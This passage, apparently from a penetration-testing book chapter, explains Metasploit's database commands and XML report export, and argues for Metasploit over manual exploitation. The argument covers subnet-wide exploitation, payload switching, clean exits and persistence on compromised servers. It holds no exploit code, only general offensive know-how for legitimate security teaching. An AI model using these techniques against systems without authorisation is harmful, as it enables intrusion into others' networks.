Let's explore what various other commands that we have in Metasploit do for databases, as shown in the following screenshot:
This command is used to interact with databases other than the default one
This command is used to export the entire set of data stored in the database for the sake of creating reports or as an input to another tool
This command is used for scanning the target with NMAP, but storing the results in the Metasploit database
This command is used to check whether the database connectivity is present or not
This command is used to disconnect from a particular database
This command is used to import results from other tools such as Nessus, NMAP, and so on
This command is used to rebuild the cache in case the earlier cache gets corrupted or is stored with older results
After gaining a basic knowledge of database commands, let's move further and perform an NMAP scan through a database extension in Metasploit. This scan will automatically add all the details that are found to various sections of Metasploit.
Let's run a service detection scan by using the
–sV switch as follows:
Once you're done with the NMAP scan, we can clearly see the output on the screen. However, the question that arises here is whether the scan results are stored in the database.
Let's verify the hosts present in the database using the
hosts command. This command will show the entire list of scanned hosts with relevant information associated with them such as the MAC address, OS information, and other details, as shown in the following screenshot:
In addition, we can see what services are available on these hosts by issuing the
Metasploit's pro edition provides great options to generate reports on a professional basis. However, when it comes to the Metasploit community edition, we can use databases efficiently to generate a report in the XML format. This can be simply achieved using the
We can simply create an XML report by issuing the following command:
msf> db_export –f xml /home/apex/report.xml
-f switch here defines the format of the report. The report in the XML format can be imported into many popular vulnerability scanners such as Nessus, and so on, which will help us in finding out more about the target host.
Why do we prefer Metasploit to manual exploitation techniques? Is this because of a hacker-like terminal that gives a pro look, or is there a different reason? Metasploit is a preferable choice when compared to traditional manual techniques because of certain factors that are discussed in the following sections.
One of the top reasons why one should go with Metasploit is because it is open source and actively developed. Various other highly paid tools exist for carrying out penetration testing. However, Metasploit allows its users to access its source code and add their custom modules. The pro version of Metasploit is chargeable, but for the sake of learning, the community edition is mostly preferred.
It is easy to use Metasploit. However, here, ease of use refers to easy naming conventions of the commands. Metasploit offers great ease while conducting a large network penetration test. Consider a scenario where we need to test a network with 200 systems. Instead of testing each system one after the other, Metasploit offers to test the entire range automatically. Using parameters such as subnet and Classless Inter Domain Routing (CIDR) values, Metasploit tests all the systems in order to exploit the vulnerability, whereas in a manual exploitation process, we might need to launch the exploits manually onto 200 systems. Therefore, Metasploit saves an ample amount of time and energy.
Most importantly, switching between payloads in Metasploit is easy. Metasploit provides quick access to change payloads using the
set payload command. Therefore, changing the meterpreter or a shell-based access into a more specific operation, such as adding a user and getting the remote desktop access, becomes easy. Generating shell code to use in manual exploits also becomes easy by using the
msfpayload application from the command line.
Metasploit is also responsible for making a much cleaner exit from the systems it has compromised. A custom-coded exploit, on the other hand, can crash the system while exiting its operations. This is really an important factor in cases where we know that the service will not restart immediately.
Consider a scenario where we have compromised a web server and while we were making an exit, the exploited application crashes. The scheduled maintenance time for the server is left over with 50 days time. So, what do we do? Wait for the next 50 odd days for the service to come up again so that we can exploit it again? Moreover, what if the service comes back after getting patched? We could only end up kicking ourselves. This also shows a clear sign of poor penetration testing skills. Therefore, a better approach would be to use the Metasploit framework, which is known for making much cleaner exits as well as offer tons of post-exploitation functions such as persistence that can help maintaining a permanent access to the server.
Metasploit offers a nice GUI and third-party interfaces such as Armitage. These interfaces tend to ease the penetration testing projects by offering services such as easy-to-switch workspaces, vulnerability management on the fly, and functions at a click of a button. We will discuss these environments more in the latter chapters of this book.
Throughout this chapter, we have been through the introduction of phases involved in penetration testing. We have also seen how we can set up an environment for testing, and we recalled the basic functionalities of Metasploit as well. We saw how we can perform a penetration test on windows XP, Windows Server 2003, and Windows 7. We also looked at the benefits of using databases in Metasploit.
After completing this chapter, we are equipped with:
Knowledge about the phases of a penetration test
Knowledge about setting up a penetration test lab for Metasploit exercises
The basics of the Metasploit framework
Knowledge about the working of traditional exploits
Knowledge about the approach to penetration testing with Metasploit
Benefits of using databases in Metasploit
The primary goal of this chapter was to inform you about penetration test phases and Metasploit. This chapter focused entirely on preparing ourselves for the next chapters.
In the next chapter, we will cover a technique that is a little more difficult, that is, scripting the components of Metasploit. We will dive into the coding part of Metasploit and write our custom functionalities to the Metasploit framework.